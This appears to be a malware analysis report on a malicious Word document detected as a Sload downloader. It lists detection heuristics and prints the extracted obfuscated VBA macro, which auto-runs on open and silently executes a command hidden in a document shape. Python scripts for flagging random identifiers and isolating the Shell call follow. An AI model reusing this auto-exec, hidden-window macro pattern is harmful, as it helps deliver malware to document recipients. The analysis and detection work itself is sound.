Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42b38d6c73c0bb6a…

MALICIOUS

Office (OLE)

Size: 128.9 KB
Created: 2018-12-06 07:15:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: d08259d92006646d3510155a2f69c832
SHA-1: 5117f9527cb681a2c0c36ecb754b2adfec1ea2c1
SHA-256: 42b38d6c73c0bb6afc33bb463940a94e728416f09e78dc9f2d2ed82dca5a2c7a
Risk score: 252

Heuristics (9)

  • ClamAV: Doc.Downloader.Sload-6775542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6775542-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Interaction.Shell(ZHMdA, zOstnFAqbBw) executes a command string that the macro assembles at run time from the text frame of a document shape (see the extracted source below); the command itself never appears in the VBA. zOstnFAqbBw is declared Const = 0, i.e. vbHide, so the spawned process has no visible window.
    Matched line in script
       KJYQfipkHnoFHZDRbr = 84093595 * CInt(189267643) + DADtKEUwPvkjTQXPQHfrmHsX + CLng(182491791 + Sgn(zJQEsHBUHJVXUZU) - 251520711 * 295610636) - DYoJfBKjhlMwIfREFLiKDcf + Chr(JOutnFWAOATDRqdOuIaQHKBp) * 41130065 / CStr(108257227) / (JDiobtpzQHRwbOLiHM / 94348115 / OhTPvBPrwNEmWkMwfMrJcq / Fix(HcLzBvctdrdGckTs + Hex(izADCiZqBOCvUEKXULn) + 231666405 + CBool(14744229 + vVUavsikMMTRfipJ)))
    mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
       ckLzLukvhVpzPJqbLSnzhwPa = 29569996 * CInt(321984377) + mdJoQUibBXOwhX + CLng(129677749 + Sgn(tTUuCLvaLnuOjVk) - 308824468 * 98752916) - zSXhZchhpDzUFaNpVHjCAbh + Chr(cdaTvjnTjpZAjMusNUVsc) * 277843252 / CStr(222639096) / (BqAdLMrVlnEwCNlIQi / 249227514 / AMGJNrpfFpHmvFSEf / Fix(IWzDPvHzqziMbwER + Hex(ojrPUWMQwjRAwvhdGW) + 98467020 + CBool(119174579 + zLBPAqwsNIidldUounAlnTPq)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    AZzwmnfWS
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag. No matched line is shown and the string does not occur in the recovered macro source; this is consistent with the command living in the document shape that the macro reads before calling Shell.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample a VBA project was in fact recovered (macros.bas below) and contains Sub autoopen(), so this marker adds no independent evidence: it is the same AutoOpen entry point already covered by the VBA findings.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace, which Word writes into any document that contains a drawing or shape (the macro here reads a shape's text frame); it is not a download or C2 address and needs no network block.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5733 bytes
SHA-256: 8d9ade891b31641ceaa8e32ccf5959b45ad0c2a76e1e81b0f4cd198916d2d0e4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
131 of 170 identifiers look randomly generated (e.g. 'YjilRXHqLuAozcpMrbWGBKwB'), consistent with name-mangling obfuscation. Most statements are padding: long arithmetic expressions over undeclared (Empty) variables whose results are never read, kept from aborting the macro by On Error Resume Next.
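One way to reproduce the identifier-randomness heuristic, as an added example that is not part of this report or of the analyser that produced it. The scoring rules (length, lower-to-upper case flips, vowel share, consonant runs, uppercase share) are my own approximation of such a check, not the tool's, and SAMPLE_VBA is a constructed excerpt of the recovered macro with the junk arithmetic shortened:

```python
import re

# Constructed excerpt of macros.bas (identifiers copied from the report,
# junk arithmetic shortened). Sample input only.
SAMPLE_VBA = '''Attribute VB_Name = "kskHBUI"
Attribute VB_Base = "1Normal.ThisDocument"
Sub autoopen()
AZzwmnfWS
End Sub

Attribute VB_Name = "oZwPEjtiP"
Function AZzwmnfWS()
On Error Resume Next
   rEiFKHsjbvDXYMbjRYEhaaQ = 138031023 * CInt(203175319) + unLDWMwEMIRzqInn + Chr(UEXquiTVCEBBXdijsAChkzo) * 147064525 / CStr(66588894)
Set hpPijdM = kskHBUI.Shapes(ozItdCoP + "msoQjGAXul" + rAtzwWj).TextFrame
ZHMdA = hpPijdM.ContainingRange + QJnMBm + QFwLwQDH
Const zOstnFAqbBw = 0
mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
End Function
'''

# Keywords and built-ins that must not be scored as user identifiers.
VBA_KEYWORDS = {
    "attribute", "sub", "function", "end", "on", "error", "resume", "next",
    "set", "const", "dim", "as", "if", "then", "else", "for", "to", "each",
    "in", "call", "exit", "true", "false", "nothing", "new", "array", "shell",
    "cint", "clng", "cstr", "cbool", "cdbl", "chr", "hex", "fix", "sgn", "int",
}
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
STRING_RE = re.compile(r'"[^"]*"')


def identifiers(src):
    """Unique user identifiers (case-insensitive), ignoring strings and comments."""
    names = {}
    for line in src.splitlines():
        line = STRING_RE.sub('""', line).split("'", 1)[0]
        for tok in IDENT_RE.findall(line):
            low = tok.lower()
            if low in VBA_KEYWORDS or low.startswith("vb_"):
                continue
            names.setdefault(low, tok)
    return sorted(names.values())


def looks_random(name):
    """Heuristic: two or more signals of machine-generated naming."""
    letters = [c for c in name if c.isalpha()]
    n = len(letters)
    if n == 0:
        return False
    upper_frac = sum(c.isupper() for c in letters) / n
    vowel_frac = sum(c.lower() in "aeiou" for c in letters) / n
    case_flips = sum(a.islower() and b.isupper() for a, b in zip(letters, letters[1:]))
    runs = re.findall(r"[^aeiouAEIOU]+", "".join(letters)) or [""]
    longest_consonant_run = max(len(r) for r in runs)
    signals = [
        n >= 8,                      # human names are usually shorter or word-like
        case_flips >= 3,             # camelCase rarely flips more than twice
        vowel_frac < 0.3,            # pronounceable words carry more vowels
        longest_consonant_run >= 5,  # e.g. 'Zzwmnf'
        n >= 5 and upper_frac >= 0.4,
    ]
    return sum(signals) >= 2


def score_source(src):
    """Count identifiers and how many of them look randomly generated."""
    names = identifiers(src)
    random_names = [nm for nm in names if looks_random(nm)]
    return {"total": len(names), "random": len(random_names),
            "ratio": len(random_names) / len(names) if names else 0.0,
            "examples": random_names[:5]}


if __name__ == "__main__":
    r = score_source(SAMPLE_VBA)
    print(f"{r['random']} of {r['total']} identifiers look randomly generated: {r['examples']}")
```

Real names from the Word object model (ContainingRange, TextFrame, Shapes) score as ordinary, while the attacker's generated names trip two or more signals; run the same scorer over a corpus of benign macros to pick a threshold before using it as a detection.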
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kskHBUI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
AZzwmnfWS
End Sub

Attribute VB_Name = "oZwPEjtiP"
Function AZzwmnfWS()
On Error Resume Next
   rEiFKHsjbvDXYMbjRYEhaaQ = 138031023 * CInt(203175319) + unLDWMwEMIRzqInn + CLng(297745753 + Sgn(waUXwsCawzURoNazNEU) - 156607557 * 161140919) - ZTASOThwumhoYEpWrSBwQBj + Chr(UEXquiTVCEBBXdijsAChkzo) * 147064525 / CStr(66588894) / (NBWcbXjFwKwrBLTLlUCozNo / 117288181 / PwBKUPAjDVRwad / Fix(RRiTmBwqOYNUTVrzNEZL + Hex(hvivvLwqCNLqYXijViB) + 113666074 + CBool(50156467 + mHujKMVEtBSEjWAYrqAALL)))
   CBsAdlnWSEQkBNVUpRG = 269726498 * CInt(202908265) + EnzjrblMczhcQK + CLng(201155540 + Sgn(SwZNHLHFssksDwvmuAwFD) - 321879945 * 301614596) - lFcTCYwLpEzKPQut + Chr(sozqsJfBviQNZiVCNcBj) * 265401563 / CStr(20487091) / (vYCwzlXdFDZLIuVtww / 118069573 / pfzQWdHBotKroTD / Fix(pKiPYFLKzXMHrjFmW + Hex(iPamcUdVpLtiWorDDlOCikUn) + 113315000 + CBool(337516110 + AKEnXUspnrDiNlCQz)))
   vmMdKSiSjcniPmzfzhwwF = 159014574 * CInt(71892825) + CbOjLKLCGYQhSvcWfK + CLng(271776495 + Sgn(CfPbsNGtLwbXbraiEzHYRkcr) - 139550925 * 117083650) - DFcTuiKSWMmqzERr + Chr(wtGaVtSjDQiSDYG) * 176458742 / CStr(5237222) / (nifjoQZDWRIJUz / 298734460 / vbLmiLKmrRcATojPwB / Fix(IcPFpBRXAXtwiYhciPOU + Hex(YspWnZjilsNTWktfWVk) + 114843000 + CBool(265097538 + PzVublLBAijBjjZj)))
Set hpPijdM = kskHBUI.Shapes(ozItdCoP + "msoQjGAXul" + rAtzwWj).TextFrame
   ouRRQwFOAHhPTVbEcmzUmoOY = 241258776 * CInt(72011545) + qTffUnbiDbQLKNzvuWXdTv + CLng(121631541 + Sgn(mFoJAfthFGOuUcNcrqYcLbpH) - 261442331 * 295164880) - BMhXuBhtOwSiXhjFDw + Chr(aSIvmcXplLQhVH) * 76987365 / CStr(286829279) / (YjUtmiwdYMAucVlJjS / 8955938 / QuuXLwiwRzWLqPjUiLnkKSN / Fix(WuJpiXmpKwDipwhqA + Hex(LbqpEMpQfXiRiwhdARmsUuLj) + 8728300 + CBool(287734736 + CfhizkKHmahqwANs)))
   IKKBIrlaHHjDXEKdAjP = 330842982 * CInt(113141551) + qARWXhiLYzNIZw + CLng(134477228 + Sgn(JoAZikFcTQOrSIFuIHUJj) - 248396215 * 131904648) - swihpPfMJSXazr + Chr(FvpDGSrtQtSzRdLwX) * 133220826 / CStr(322584178) / (mCYmElCiAkfzRpOOuiNlA / 20949039 / nWQNiwTzGAJfDWCzU / Fix(ItfOVicPzEpGLjjjk + Hex(oYTkjlYwHJKrrjtUs) + 66643753 + CBool(254921472 + BhlSAPJAodwTlnKwwYM)))
ZHMdA = hpPijdM.ContainingRange + QJnMBm + QFwLwQDH + thjXqvDT + sGBwVIbG + tdvNcu + lNtcfq + MsOBIcp + SMfnDsz + ZPTofl + ZzuiiHb
   qqwDQilwqAKFsMH = 255035759 * CInt(67174312) + qjErLjXCnDiMqR + CLng(194912896 + Sgn(dICjOVwkhoLWdQ) - 26779132 * 39971509) - NiYEwiQfOriQdKscoj + Chr(jamUiUKXVBYWzcscjFwfdmEA) * 193575066 / CStr(103861410) / (DiStohFWtbNpkoHvdp / 141650116 / olhJWpDUzWmrTAGtCIkou / Fix(zBWQOqWqaKHjfSw + Hex(WzdkYWpVWkhNsVE) + 217311344 + CBool(267515595 + ljnGbNwGwbjmUowullKJh)))
   AnicboGjNiLUJfdpzDCdi = 235785499 * CInt(125392291) + qFMqmYlahHwzTaBSw + CLng(175854902 + Sgn(LaENdjPzuRwCQTTmVbPtptk) - 255865032 * 13051713) - jVWBkfHqInmrjHXaqJkEf + Chr(znjqihDRqRLuCtatjRua) * 78696410 / CStr(211815179) / (isIWOCaCzDCViV / 301696148 / anqzUfoEdAzdSJFRTnCwZKoP / Fix(OOqAYrYmVTmVifwDE + Hex(OFzjnzlCvTvWQwahFRzEEJY) + 279775810 + CBool(326499888 + SvlIEuVQaKSfbtOWwFrwDo)))
   ZVNuYPCwOJOQrzUlENvX = 314805631 * CInt(224216820) + aMwJjtdqrkkZOG + CLng(186669184 + Sgn(mGXYDinzIXjEjck) - 239302580 * 283691933) - mhbFTDlTXfHaFfcGJ + Chr(XJzsYwAMJYJPAAiwU) * 308571890 / CStr(204613742) / (nUnjLIqiREcZSTMhSuIc / 34181039 / tMJHfGsJKhbcdDW / Fix(jQISuFwkwjnAialCb + Hex(aaZDdjqItuzppJLBNsUn) + 84093760 + CBool(264414550 + ZLzSrikvZBzcvrdnY)))
   JHdIDCPSwwZRcnmcsKzNn = 140832624 * CInt(194786504) + alzjaNqfSzwoiSYLXnKpckvO + CLng(31606565 + Sgn(mfmizndjhRFirlIuwdqzu) - 173992467 * 247615500) - pzLoTqqibqbKsoBILBkGGp + Chr(YjilRXHqLuAozcpMrbWGBKwB) * 67285936 / CStr(185546078) / (msqijAEmHlEYKUAPPsADj / 145093472 / sijiuOihbpqUzVPUntqhbn / Fix(LlAuiJJYBQEzzw + Hex(JXZDdiUADtAXMJqoM) + 37759478 + CBool(180741170 + ztTzYRQoDsYPXWkSHXK)))
   iswCLonjzkHqnvCvR = 293423476 * CInt(50046014) + kHsrRCUIotCoEIwwzE + CLng(139649554 + Sgn(ImUCNKqhzkZFuAiazHl) - 60463012 * 131291512) - rDiSliwFwMXjLwmqdGLn + Chr(DTwtDiXzpTMEcuRT) * 304712343 / CStr(162125172) / (ktlMiKojoIdizjVo / 233957703 / ZiAYHJtLfiDVXjizCPRHNi / Fix(wjpMpOXHGihVqLMlc + Hex(XfFcTltwwdFWcYqTCo) + 124271912 + CBool(324473951 + zHbwmpOrnqdpnq)))
Const zOstnFAqbBw = 0
   KJYQfipkHnoFHZDRbr = 84093595 * CInt(189267643) + DADtKEUwPvkjTQXPQHfrmHsX + CLng(182491791 + Sgn(zJQEsHBUHJVXUZU) - 251520711 * 295610636) - DYoJfBKjhlMwIfREFLiKDcf + Chr(JOutnFWAOATDRqdOuIaQHKBp) * 41130065 / CStr(108257227) / (JDiobtpzQHRwbOLiHM / 94348115 / OhTPvBPrwNEmWkMwfMrJcq / Fix(HcLzBvctdrdGckTs + Hex(izADCiZqBOCvUEKXULn) + 231666405 + CBool(14744229 + vVUavsikMMTRfipJ)))
mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
   ckLzLukvhVpzPJqbLSnzhwPa = 29569996 * CInt(321984377) + mdJoQUibBXOwhX + CLng(129677749 + Sgn(tTUuCLvaLnuOjVk) - 308824468 * 98752916) - zSXhZchhpDzUFaNpVHjCAbh + Chr(cdaTvjnTjpZAjMusNUVsc) * 277843252 / CStr(222639096) / (BqAdLMrVlnEwCNlIQi / 249227514 / AMGJNrpfFpHmvFSEf / Fix(IWzDPvHzqziMbwER + Hex(ojrPUWMQwjRAwvhdGW) + 98467020 + CBool(119174579 + zLBPAqwsNIidldUounAlnTPq)))
   ilpvJubSNNdfhMsVOrr = 278873680 * CInt(302277912) + fQpROtMttDEtYBFNhmRKBZST + CLng(81914191 + Sgn(czBsAQfmFYFsjhG) - 129913460 * 129196190) - aonqPAJFYjuGzWFGRMr + Chr(DnNmvhIpGkDiFt) * 294330464 / CStr(155962379) / (ljBivswszainZQtcSV / 257791974 / AvirUzofMAEdhlfdpSI / Fix(RuwHZBjTJFmYFwTqBJNwDRjz + Hex(FFolQmANrKGzbSTSUV) + 41866757 + CBool(89906531 + YlRocjELrzOzlUvritTm)))
End Function
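The listing above is mostly padding; the live path is four statements. The following added example (not part of the report or of oletools) recovers them with a backward slice from the Shell() call and then resolves the window-style constant and the shape the command string is read from. MACRO is a constructed excerpt of Function AZzwmnfWS() with the junk lines shortened; the SINKS list is an assumption about which calls are worth slicing from, and WINDOW_STYLES holds the standard VBA Shell windowstyle constants:

```python
import re

# Constructed excerpt of Function AZzwmnfWS() from macros.bas. The real
# statements are copied as they appear; junk arithmetic lines are shortened.
MACRO = '''Function AZzwmnfWS()
On Error Resume Next
   rEiFKHsjbvDXYMbjRYEhaaQ = 138031023 * CInt(203175319) + unLDWMwEMIRzqInn + Chr(UEXquiTVCEBBXdijsAChkzo)
   CBsAdlnWSEQkBNVUpRG = 269726498 * CInt(202908265) + EnzjrblMczhcQK + Hex(iPamcUdVpLtiWorDDlOCikUn)
Set hpPijdM = kskHBUI.Shapes(ozItdCoP + "msoQjGAXul" + rAtzwWj).TextFrame
   ouRRQwFOAHhPTVbEcmzUmoOY = 241258776 * CInt(72011545) + qTffUnbiDbQLKNzvuWXdTv
ZHMdA = hpPijdM.ContainingRange + QJnMBm + QFwLwQDH + thjXqvDT
   qqwDQilwqAKFsMH = 255035759 * CInt(67174312) + qjErLjXCnDiMqR
Const zOstnFAqbBw = 0
   KJYQfipkHnoFHZDRbr = 84093595 * CInt(189267643) + DADtKEUwPvkjTQXPQHfrmHsX
mIAjawInT = Array(HYfJXRBf, bjjLQCpb, ZfiLG, Interaction.Shell(ZHMdA, zOstnFAqbBw), ztMPvVRH)
   ckLzLukvhVpzPJqbLSnzhwPa = 29569996 * CInt(321984377) + mdJoQUibBXOwhX
End Function
'''

SINKS = ("Shell", "CreateObject", "GetObject", "Run", "Exec", "Navigate")  # assumed sink list
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+|Const\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
STRING_RE = re.compile(r'"[^"]*"')


def defined_name(line):
    """Name assigned on this line (Set/Const/plain assignment), or None."""
    m = ASSIGN_RE.match(line)
    return m.group(1) if m else None


def used_names(line):
    """Identifiers read on this line (right-hand side only for assignments)."""
    m = ASSIGN_RE.match(line)
    rhs = m.group(2) if m else line
    return set(IDENT_RE.findall(STRING_RE.sub('""', rhs)))


def backward_slice(src):
    """Keep only statements that feed a sink call, directly or transitively."""
    lines = src.splitlines()
    keep, wanted = set(), set()
    for i, ln in enumerate(lines):
        if any(re.search(r"\b%s\s*\(" % s, ln) for s in SINKS):
            keep.add(i)
            wanted |= used_names(ln)
    changed = True
    while changed:  # fixed point: pull in every definition of a wanted name
        changed = False
        for i, ln in enumerate(lines):
            if i not in keep and defined_name(ln) in wanted:
                keep.add(i)
                wanted |= used_names(ln)
                changed = True
    return [lines[i].strip() for i in sorted(keep)]


def describe_shell(src):
    """Resolve the Shell() command variable, window style and source shape name."""
    sl = backward_slice(src)
    consts = {}
    for ln in sl:
        m = re.match(r"Const\s+([A-Za-z_]\w*)\s*=\s*(\d+)", ln)
        if m:
            consts[m.group(1)] = int(m.group(2))
    info = {}
    for ln in sl:
        m = re.search(r"\bShell\s*\(\s*([A-Za-z_]\w*)\s*,\s*([A-Za-z_]\w*|\d+)\s*\)", ln)
        if m:
            tok = m.group(2)
            style = int(tok) if tok.isdigit() else consts.get(tok)
            info.update(command_var=m.group(1), window_style=style,
                        window_style_name=WINDOW_STYLES.get(style, "unknown"))
        m = re.search(r"\bShapes\(([^)]*)\)", ln)
        if m:
            lit = STRING_RE.search(m.group(1))
            info["shape_name"] = lit.group(0).strip('"') if lit else None
    return info


if __name__ == "__main__":
    for stmt in backward_slice(MACRO):
        print(stmt)
    print(describe_shell(MACRO))
```

The slice leaves the Set hpPijdM, ZHMdA, Const and Shell statements and drops every junk assignment, because nothing ever reads those names. The command string itself is not recoverable from the VBA project: it sits in the text frame of shape msoQjGAXul and has to be pulled from the document's drawing text, which is the likely location of the cmd.exe string that SC_STR_CMD flagged.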